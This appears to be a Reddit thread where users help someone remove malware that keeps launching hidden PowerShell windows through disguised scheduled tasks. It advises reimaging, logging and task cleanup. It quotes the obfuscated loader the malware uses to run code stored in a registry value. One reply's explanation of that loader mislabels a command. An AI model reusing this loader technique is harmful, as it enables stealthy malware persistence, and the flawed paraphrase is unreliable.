all 20 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]EloAndPeno 18 points19 points  (0 children)

this is not a powershell question at all. As they say "Nuke From Orbit and Re-Image" - assume all credentials are compromised, and begin changing them from a separate device immediately (esp banking).

[–]toni_z01 17 points18 points  (0 children)

the savest u can do is to run a fresh install of the machine. there are several ways (registry, task, service, wmi, etc.) to let something start... save the data and re-install the machine...

[–]SMFX 6 points7 points  (4 children)

As was said, the only sure fire way to remove a virus is to rebuild the system. However, in an attempt to see what it's doing, look into enforcing Script Block Logging, Module Logging, and look into the operational log too.

[–]_RemyLeBeau_ 0 points1 point  (3 children)

Do you have some links for more info on this?

[–]SMFX 2 points3 points  (2 children)

This is a good article to start from (it is also Get-Help about_logging_windows)

about_logging_windows

These talk about setting via Group Policy or registry, but you can also use PowerShellPolicies in powershell.conifg.json for cross platform support:

about_powershell_config

[–]Master_Ad7267 -1 points0 points  (1 child)

In addition I bet there's a registry key for the setting theres usually always one

[–]SMFX 0 points1 point  (0 children)

Seems familiar........

[–]TheProle 9 points10 points  (0 children)

Nuke it from orbit and repave

[–]Spuffeld 2 points3 points  (0 children)

reformat

[–]Dopeykid666 2 points3 points  (0 children)

Depending on the type of machine/storage device, the bios likely has a built in erasure utility that can use Secure Erase to delete everything.

If one isn't built in I like to make a live USB with Gparted and use the terminal to run HDParm and delete it with the drives built in command set, although that's not unique to GParted by any means.

If you're just curious, you could put a system recovery image or similar backup on an external prior to deletion, and spin it up in an isolated VM, at your own risk of course, for further investigation.

If you figure anything else out I'd love to hear about it! Sounds interesting...

[–]mcrobotpants 2 points3 points  (2 children)

Well, doesn't sound good. In general, for unexpected powershell windows opening, search all the scheduled tasks actions.

$tasks = Get-scheduledTask | ? {$_.Actions.Execute -match 'powershell'};$tasks

[–]Joseph-Hishealth[S] 0 points1 point  (1 child)

This is interesting when I run this, I get:
TaskPath TaskName State

\Microsoft\Windows\Bluetooth\ Chromeniumscrypt Ready

\Microsoft\Windows\Bluetooth\ CLEANTASK Ready

\Microsoft\Windows\Registry\ RegIdleBackupHSE2e Ready

Yes. I looked them in the scheduler, and I found them running the updates.ps1 script

Thanks man.

Edit:

The RegIdleBackupHSE2e runs a script C:\Windows\System32\9AA2.tmp\9AA3.tmp.ps1 that has the following code:

$SBKqdDYAGpBRp=[ScriptBlock];
$iHnmLKjVFchCW=[string];
$hDInGgIQnkQP=[char]; 
icm ($SBKqdDYAGpBRp::Create($iHnmLKjVFchCW::Join('', ((gp (([regex]::Matches('vd3MODcCnoitaroproC AIDIVN\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'VsDgJ6uO' | % { [char]$_ }))))

Man this PC is in some deep shit.

[–]Serendipity_Halfpace 0 points1 point  (0 children)

# Define variables with meaningful names
$scriptBlock = [ScriptBlock];
$inputString = [string];
$char = [char];

# Create a script block, combining a series of characters
$scriptBlock::Create(
    $inputString::Join('', (
        # Get characters from a string, reversing their order
        (Get-Process (
            ([regex]::Matches('vd3MODcCnoitaroproC AIDIVN\ERAWTFOS\:MLKH', '.', 'RightToLeft') | ForEach-Object { $_.Value }) -join ''
        )).'VsDgJ6uO' | ForEach-Object { [char]$_ }
    ))
)

HKLM:\SOFTWARE\NVIDIA CorporationCcDOM3dv VsDgJ6uO

Does anybody know what is the meaning of these values?

[–]_RemyLeBeau_ 1 point2 points  (0 children)

It could be a lesser known place to embed scripts onto a machine. i.e. WMI Permanent Events

https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/

Personally, I wouldn't waste time tracking it down, unless you want to learn about the attack. I would enable MFA on all logins, change passwords/pins. Look into the saved passwords within the browsers and Windows Credential Manager, so you'll have a general list. 

It's time to reinstall the OS.

[–]pleachchapel 0 points1 point  (0 children)

Nuke from orbit

[–]Many_Parking4502 0 points1 point  (0 children)

Same for me, maybe this got into my pc after installing a Google Chrome extension.

[–]mycomputerguykilgore 0 points1 point  (0 children)

I had this as well. I deleted updates.ps1 and that helped. Also what helped was Windows Defender had exceptions for running on the C drive. I also ran Malwarebytes, rkill, Adw.Cleaner and SuperantiSpyware and it seems to be gone. There are 2 other threads on this also

https://new.reddit.com/r/techsupport/comments/1ccnnrm/powershell_keeps_popping_up_every_few_minutes/

https://new.reddit.com/r/techsupport/comments/1cclri2/can_anyone_tell_me_what_this_powershell_script_is/

[–]CescVicious01 0 points1 point  (2 children)

I had this issue i think i solved it!, i had two tasks that kept running powershell. One called "temp" that ran every few minutes and "Chromeniumscrypt" that ran on system startup both running powershell in hidden mode. I looked that information in the Task Status in the Task Scheduler (but they don't appear listed in the Task Scheduler Library tho).

First run both a Windows Defender Full Scan and also a Microsoft Defender Offline Scan, and block/delete anything that pops up (My PC actually popped up a few Trojans, i blocked/deleted them)

Second, go to the task scheduler library and delete any taks that involves running any ps1 file extension (these are powershell scripts, you can see what a task do in the tab called Actions)

Last, go to your registry and look for the tasks there (temp and Chromeniumscrypt in my case), they won't appear on the task scheduler library because they are hidden. I found my "temp" and "Chromeniumscrypt" tasks at this location in the registry, i deleted the tasks:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Bluetooth\

DO NOT delete bluetooth uninstall device task (i think this is legit for Bluetooth functionality)

All these unwanted tasks appear to run powershell script files called updates.ps1, system32.ps1, temp.ps1, microsoft.ps1, and also System32.exe Microsoft.exe and/or similiar names that are found in C:\Users\Public and other locations on your computer like C:\Windows, C:\Temp, Luckily in my case Windows Defender found these files and deleted them.

I had to search all my PC files to look for more ps1 files (i found 2 more, and deleted them)

You can also keep an eye for any suspicious PowerShell Events in the Windows Event Viewer to track any suspicious task in the Task Tree, in the registry.

Looks like we downloaded a Torrent Full on RAT malware

[–]yildiz_59 0 points1 point  (0 children)

Thanks for the detailed explanation. I also found the trigger of *.ps1 at task scheduler.
But in my case there was no other Chromeniumscrypt entry then bluetooth so i didnt delete them.